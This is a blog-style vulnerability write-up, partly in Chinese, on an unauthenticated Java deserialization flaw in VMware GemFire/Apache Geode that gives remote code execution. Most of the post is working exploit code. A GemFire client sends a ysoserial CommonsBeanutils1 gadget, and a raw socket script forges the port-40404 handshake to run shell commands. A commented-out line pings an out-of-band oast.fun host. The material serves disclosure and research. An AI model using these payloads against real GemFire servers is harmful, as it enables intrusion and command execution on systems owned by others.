官方在文档上加了提示 https://docs.vmware.com/en/VMware-GemFire/10.0/gf/managing-security-hardening-guide.html 公开此漏洞
该漏洞是我在挖掘VMware vROPS产品中发现的反序列化漏洞,但是在VMware vROPS产品中并不能直接利用,因为该产品开启了ssl并且开启了双向认证,必须有ssl的证书才可以反序列化。这里先记录一下未开启ssl的反序列化RCE。
Unauthorized deserialization exists in gemfire, and attackers can construct malicious deserialized data to execute code on the target machine.
vmware-gemfire-9.15.2.tar.gz from https://network.tanzu.vmware.com/products/pivotal-gemfire/
or apache geode from github
1
2
3
| .\gfsh.bat
start locator --name=locator1
start server --name=server1
|
locator port 10334 server port 40404
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/fdb28504-e9eb-8a83-3cbf-af718525fae7.png)
Import ysoserial-all.jar in dependencies
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| import com.vmware.vcops.platform.api.PlatformException;
import org.apache.geode.cache.Region;
import org.apache.geode.cache.client.ClientCache;
import org.apache.geode.cache.client.ClientCacheFactory;
import org.apache.geode.cache.client.ClientRegionShortcut;
import ysoserial.payloads.CommonsBeanutils1;
public class Main {
public static void main(String[] args) throws Exception, PlatformException {
ClientCache cache = new ClientCacheFactory().addPoolLocator("127.0.0.1", 10334).set("log-level", "NONE").create();
Region<Object, Object> region = cache.createClientRegionFactory(ClientRegionShortcut.PROXY).create("example");
Object object = new CommonsBeanutils1().getObject("notepad");
region. put(object, object);
}
}
|
The malicious deserialized object “object” will be deserialized when sent to the server with port 40404, thus executing the notepad command.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/1a051cef-3662-dff4-19f3-647522185fec.png)
or use this port send serialize data to port 40404
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
| import ysoserial.Serializer;
import ysoserial.payloads.CommonsBeanutils1;
import java.io.DataOutputStream;
import java.io.OutputStream;
import java.io.Serializable;
import java.net.Socket;
public class SocketTest {
public static void main(String[] args) throws Exception {
String host = "192.168.1.166";
Socket client = new Socket(host, 40404);
OutputStream outputStream = client.getOutputStream();
// CommunicationMode 0x64=100=ClientToServer
outputStream.write(0x64);
// version 255 0 150
outputStream.write(0xff);
outputStream.write(0x0);
outputStream.write(0x96);
// valRead REPLY_OK
outputStream.write(0x3b);
DataOutputStream dataOutputStream = new DataOutputStream(outputStream);
// timeout
dataOutputStream.writeInt(10000);
// DSCODE SERIALIZABLE
dataOutputStream.write(0x2c);
Serializable notepad = (Serializable) new CommonsBeanutils1().getObject("touch /tmp/fuck" + System.currentTimeMillis());
// Serializable notepad = (Serializable) new URLDNS().getObject("http://" + System.currentTimeMillis() +"."+host+ ".cfj4rxv2vtc0000y0xngg83ncqhyyyyyb.oast.fun");
dataOutputStream.write(Serializer.serialize(notepad));
dataOutputStream.flush();
dataOutputStream.close();
outputStream.flush();
outputStream.close();
client.close();
}
}
|
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。